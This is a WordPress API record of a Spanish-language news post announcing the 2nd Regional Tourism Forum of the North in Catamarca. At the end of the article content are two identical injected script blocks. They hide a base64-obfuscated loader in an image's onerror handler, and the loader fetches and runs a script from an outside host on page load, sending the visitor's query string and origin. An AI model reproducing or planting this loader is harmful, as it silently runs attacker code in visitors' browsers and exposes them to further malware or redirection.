{"id":4291,"date":"2024-08-12T21:28:18","date_gmt":"2024-08-13T00:28:18","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4291"},"modified":"2025-08-13T23:50:54","modified_gmt":"2025-08-14T02:50:54","slug":"catamarca-sera-la-sede-del-2o-foro-regional-de-turismo-del-norte","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4291","title":{"rendered":"Catamarca ser\u00e1 la sede del 2\u00ba Foro Regional de Turismo del Norte"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-5ec5867a24f25fb4ee886410b5097718\" style=\"background-color:#06669e\"><em>Se realizar\u00e1 el 5 de septiembre bajo el lema \u201cNorte sin l\u00edmites\u201d. El primer encuentro fue el a\u00f1o pasado en Salta, con m\u00e1s de dos mil participantes. Inscripciones abiertas.<\/em><\/h3>\n\n\n\n<p>El pr\u00f3ximo 5 de septiembre se llevar\u00e1 a cabo el&nbsp;<strong>2\u00ba Foro Regional de Turismo del Norte<\/strong>. Catamarca ser\u00e1 la provincia anfitriona de este evento que convoca bajo el lema \u201cNorte sin l\u00edmites. Explorando las nuevas oportunidades y desaf\u00edos para la regi\u00f3n\u201d.<\/p>\n\n\n\n<p>La cita es en el Predio Ferial Catamarca y ya est\u00e1n abiertas las inscripciones para los interesados en ser parte de esta conversaci\u00f3n en la que intervendr\u00e1n representantes del turismo de los sectores p\u00fablico, privado y acad\u00e9mico de Catamarca, Jujuy, La Rioja, Salta, Santiago del Estero y Tucum\u00e1n. La invitaci\u00f3n tambi\u00e9n est\u00e1 abierta a asistentes de otras provincias y pa\u00edses lim\u00edtrofes.<\/p>\n\n\n\n<p>El 2\u00ba Foro da continuidad a este evento que inici\u00f3 en 2023 en Salta, reuniendo a los actores tur\u00edsticos del NOA con el objetivo de promover la internacionalizaci\u00f3n del turismo en la regi\u00f3n. Este a\u00f1o, la conversaci\u00f3n continuar\u00e1 con el abordaje de tem\u00e1ticas relacionadas al desarrollo de experiencias tur\u00edsticas sostenibles de gesti\u00f3n integrada, posicionamiento y comercializaci\u00f3n del destino norte.<\/p>\n\n\n\n<p>Durante el evento se presentar\u00e1n l\u00edneas estrat\u00e9gicas de gesti\u00f3n a cargo de los actuales l\u00edderes tur\u00edsticos de la regi\u00f3n, se expondr\u00e1n casos de \u00e9xito tanto a nivel nacional como internacional, y se compartir\u00e1n las expectativas de los viajeros de la mano de expertos<\/p>\n\n\n\n<p>El objetivo principal de esta edici\u00f3n hace foco en la exploraci\u00f3n y fortalecimiento de estrategias para la valoraci\u00f3n y diversificaci\u00f3n de la actual oferta tur\u00edstica, proponiendo contenido que permita comprender las transformaciones del territorio.<\/p>\n\n\n\n<p>Tambi\u00e9n se profundizar\u00e1 sobre herramientas de innovaci\u00f3n, creatividad, trabajo en equipo, estrategias de comunicaci\u00f3n digital y taller de trabajo colaborativo tanto del sector p\u00fablico, como privado y acad\u00e9mico.<\/p>\n\n\n\n<p>\u201cEstamos muy contentos de recibir este gran evento en Catamarca, en el que esperamos a m\u00e1s de 2.000 asistentes entre profesionales, estudiantes y actores privados del sector tur\u00edstico\u201d, se\u00f1al\u00f3 Daiana Rold\u00e1n, ministra de Cultura, Turismo y Deporte de Catamarca.<\/p>\n\n\n\n<p>Las inscripciones son de car\u00e1cter gratuito y se realizan a trav\u00e9s del siguiente sitio web:&nbsp;<a href=\"https:\/\/fororegionalnorte.gob.ar\/\">https:\/\/fororegionalnorte.gob.ar\/<\/a>.&nbsp;<\/p>\n\n\n\n<p>Pronto se dar\u00e1 a conocer la programaci\u00f3n completa del evento.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/catamarca-sera-la-sede-del-2-foro-regional-de-turismo-del-norte-97174\">Secretaria de comunicaci\u00f3n <\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se realizar\u00e1 el 5 de septiembre bajo el lema \u201cNorte sin l\u00edmites\u201d. El primer encuentro fue el a\u00f1o pasado en Salta, con m\u00e1s de dos mil participantes. Inscripciones abiertas. El pr\u00f3ximo 5 de septiembre se llevar\u00e1 a cabo el&nbsp;2\u00ba Foro Regional de Turismo del Norte. Catamarca ser\u00e1 la provincia anfitriona de este evento que convoca [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4292,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-4291","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4291"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4291"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4291\/revisions"}],"predecessor-version":[{"id":6714,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4291\/revisions\/6714"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4292"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4291"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4291"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4291"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}